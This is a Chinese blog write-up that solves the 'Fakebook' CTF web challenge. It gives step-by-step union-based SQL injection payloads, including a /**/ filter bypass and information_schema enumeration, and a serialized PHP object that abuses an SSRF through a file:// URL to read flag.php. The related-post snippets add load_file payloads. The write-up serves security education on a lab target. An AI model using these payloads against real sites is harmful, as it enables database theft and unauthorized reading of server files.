攻防世界【Fakebook】解题方法

最新推荐文章于 2024-04-23 16:54:50 发布
最新推荐文章于 2024-04-23 16:54:50 发布
阅读量687 收藏 3
点赞数
分类专栏: 安全 文章标签: web安全 php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43923736/article/details/125415139
版权

攻防世界【Fakebook】解题方法

简单分析

进入页面后发现,有一个login和一个join按钮,点击join发现无法注册,提示Blog is not valid.
在这里插入图片描述
所以blog应该是需要特定的格式才行,查看robots.txt文件,发现有一个文件名user.php.bak
在这里插入图片描述
尝试直接访问user.php.bak,发现会直接下载这个文件,文件内容如下
在这里插入图片描述
根据函数isValidBlog,可以看出blog的格式需要是URL地址
所以把blog写成www.baidu.com注册

SQL注入

判断SQL注入类型

注册成功后进入view界面,发现地址栏有一个no=1参数,猜测可能会存在SQL注入漏洞
尝试

no=1'

报语法错误
尝试

no=1'#

依然报语法错误
尝试

no=1#test

能正常访问,说明no是整型,且后面可以直接拼接语句

判断select语句的列数

no=1 order by 1
no=1 order by 2
no=1 order by 3
no=1 order by 4
no=1 order by 5  #报错

可以得出列数为4

判断回显

no=1 union select 1,2,3,4 limit 1,1

发现被过滤
在这里插入图片描述
所以使用union all或者中间添加注释

no=1 union /**/select 1,2,3,4 limit 1,1
no=1 union all select 1,2,3,4 limit 1,1

在这里插入图片描述
由此可以判断第二列有回显
然后就是获取数据库名、表名、列名、数据内容

no=1 union /**/select 1,database(),3,4 limit 1,1

得到数据库名:fakebook

no=1 union /**/select 1,group_concat(table_name),3,4 from information_schema.TABLES where Table_schema='fakebook' limit 1,1

得到表名:users

no=1 union /**/select 1,group_concat(column_name),3,4 from information_schema.columns where Table_schema='fakebook' and table_name='users'  limit 1,1

得到列名:no,username,passwd,data

no=1 union /**/select 1,group_concat(data),3,4 from fakebook.users limit 1,1

得到data字段存储的内容

在这里插入图片描述

序列化

根据上面data字段存储的内容,很容易可以看出是类UserInfo的对象序列化后的结果
当输入no=2这个不存在的id时,报错如下
在这里插入图片描述
可以看出content模块调用的是getBlogContents,而getBlogContents又调用get函数,传入的参数是$this->blog,由此可以推测,$this是被反序列化后的UserInfo
get函数的功能是用curl请求页面内容,但是没有过滤url,可以通过构造url为file协议,从而实现访问本地文件
现在关键的问题有两个:一是flag放到了哪个文件中,二是如何让data字段的内容变成本地文件路径

首先解决第一个问题,flag在哪个文件中,使用御剑扫描,结果如下在这里插入图片描述
由此可知,flag.php在服务器根目录下,从前面的报错内容可以看出服务器根目录为/var/www/html,所以需要构造的blog为file:///var/www/html/flag.php

现在只剩下最后一个问题,如果让blog也就是数据库的data字段的值为file:///var/www/html/flag.php序列化后的结果,由于blog被限制为网址类型,所以注册方式不可行
但是,可以通过不指明数据表的select语句将file:///var/www/html/flag.php放入select查询的结果集中,然后通过limit控制取出该行结果
首先进行序列化
在这里插入图片描述
得到结果

O:8:"UserInfo":3:{s:4:"name";s:2:"rr";s:3:"age";i:23;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

最后payload为

no=1 union /**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"rr";s:3:"age";i:23;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users limit 1,1

得到文件内容
在这里插入图片描述
base64解码后即可得到flag
在这里插入图片描述

且听,雨鸣。
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
fake_useragent.zip
08-27
python使用的fake_useragent.json
fakebook攻防世界) (正则+robots+sql+绕过)
一醉一休的博客
02-23 1706
一、fakebook攻防世界) 1) 2)扫描下可以找到有robots.txt 3)输入/user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://(可有可无),然后是数字和字符,加一个. 然后是2-6个字母 4)创建个用户,主要注意blog 5)注册成功返回 6)点开aaa 7)url中有no=1,尝试or'1'='1注入,存在注入后 order by 4# 8)...
攻防世界-fakebook-(详细操作)做题过程
qq_43715020的博客
06-20 4440
攻防世界-fakebook-(详细操作)做题过程
[网鼎杯 2018]Fakebook 反序列化+SQL
2301_76690905的博客
10-25 179
一开始在登录界面选择admin用户然后爆破密码,但是没什么结果,sql注入,xss也没什么回显于是选择join四个空填了1显示Blog is not valid.猜测可能是博客网址?复制了一篇博客内容过去blog后面成功登录发现username那一行可以点进去,点进去后上方url栏多了view.php?
[网鼎杯 2018]Fakebook
pakho_C的博客
02-12 1347
web第32题 [网鼎杯 2018]Fakebook 打开靶场 一个简单的登陆和注册并发布博客的页面 尝试join页面注册始终提示blog is not valid,应该是做了某种限制,又获取不到源码,那直接用dirmap来一波目录扫描看看了 得到2个比较敏感的文件,先访问一下view.php 竟然报错了,而且像是sql的报错 再访问一下robots.txt。这个文件通常用来保存服务器的一些敏感信息 提示了一个.bak后缀的备份文件。直接访问,下载下来 得到user.php的源码 <?php
攻防世界fakebook的一次解题过程(萌新拙见)
tht03553的博客
10-26 389
发现这个用户的权限是一个超级用户,权限很高,这是就可以使用一个非常规的方法,比较简单,就是利用mysql里的load_file()函数,该函数的作用是访问系统文件,并且将其用字符串的方式返回,不过其条件比较苛刻,需要文件的绝对路径和高级权限,但是,我们刚好满足这些条件,所以构造payload。发现只有一个注册和登录的按钮,在正式攻击这个靶场前,先进行信息收集,利用扫描工具来扫描这个网站的后台网页,看有没有漏掉的信息,这里我用的是御剑扫描,对于一些不想下命令工具的朋友来说,御剑算是一个不错的选择。
【愚公系列】2023年05月 攻防世界-Webfakebook
时光隧道
05-27 7673
SQL注入是通过将恶意代码注入到SQL语句中,从而将攻击者想要的任意数据库操作(例如删除,修改或查看数据)注入到应用程序中的一种安全漏洞。这种攻击通常是通过在Web表单,搜索框或其他用户输入字段中添加特殊字符或代码来实现的,这些字符或代码可以使SQL语句产生意外的行为。攻击者可以利用这种漏洞访问敏感的数据库信息,包括用户凭据、私人信息和个人身份信息。为了保护应用程序不受SQL注入攻击的影响,开发人员通常应在接受用户输入时对数据进行验证和过滤,并使用参数化查询或预编译语句来防止SQL注入。
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
假书
facebook-rockin-最佳自动化-selenium-scrape-no-api-tool-bot-machine-made-to-destroy-facebook:Facebook自动化:登录,喜欢,共享,评论,发布,删除。 包含视频“实际中”。 目的主要是通过在Fakebook平台中填充垃圾内容来破坏Fakebook平台(例如,当您决定离开所有这些Fcking平台时,在其中自杀)。 请安装,测试并提交您自己的改进和功能! 谢谢!
03-03
facebook-rockin最佳自动化Selenium消除无api工具的机器人机器做成销毁facebook ... 特征: 一切都是使用Selenium进行的,没有使用API 可见/无头模式 登录 获取/缓存朋友 遍历时间线 给个赞(也是不同的类型) ...
攻防世界-fakebook
wwxxss
11-15 697
如果我们确定了一个页面存在,访问后页面内容为空,有两种情况,要么页面本身就没有内容,那我们还玩个锤儿啊。base64,dGhlIHVzZXIgaXMgYWRtaW4,但是我们首先不知道如何对其添加语法,其次我们目前还不知道flag.php在那个目录下,因此我们利用sql注入看看。但是当我们使用联合查询的时候,发现其有过滤,我试了很久,最后借鉴其他的解法,发现是应该检测union select这个字符串,因此我们可以使用union++select活着union/**/select进行绕过。
攻防世界--fakebook
m0_67467924的博客
05-22 489
继续注入,得到数据库中存在一个users表,表中含有no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS 字段,查看username,passwd字段内容,不对,这个内容就是我刚刚注册的,没有其他用户的,对我来说没用啊,看看data字段,返回值是序列化后的值。构造payload:2 /**/union /**/ select 1,load_file('/var/www/html/flag.php') ,3,4#
[网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3427
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
攻防世界——fakebook
m0_62063669的博客
06-22 1758
攻防世界——fakebook /user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://注册成功 点击username里的1url中有no=1,可以尝试一下,是否有注入(and 1=1不报错,and 1=2报错,所以存在sql注入) order by 4不报错,order by 5报错,所以有四个字段尝试查询数据库名,然后被拦截 尝试绕过,/**/可以绕过,发现2是回显点 得到当前数据库为fakebook ......
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1240
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
从内部防护汽车网络安全——硬件安全模块(HSM)保护ECU主处理器内部
最新发布
dianqicyuyan的博客
04-23 276
HSM是一种硬件,它以物理方式封装了安全功能。其集成芯片专为IT安全应用而设计,通常具有自己的处理器核心、各种内存(RAM、ROM、闪存等)和硬件密码加速器。此外,HSM必须满足用于车辆应用的特定标准,并且极其有效的集成对于降低成本至关重要。其主要要求包括ECU应用程序和HSM之间的安全接口,以及用于分析故障的调试/测试接口。HSM必须能够以尽可能短的等待时间处理加密信息,并能够承受汽车环境中的标准温度。从根本上说,HSM通过其自己的处理器核心来执行汽车应用场景所需的所有IT安全功能。
网络安全(黑客)—2024自学
dexi1113的博客
04-16 1716
我在这里可以很肯定地告诉你:"网络安全有很好的发展前景,前沿网络安全技术即将崛起,或者说已经崛起"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值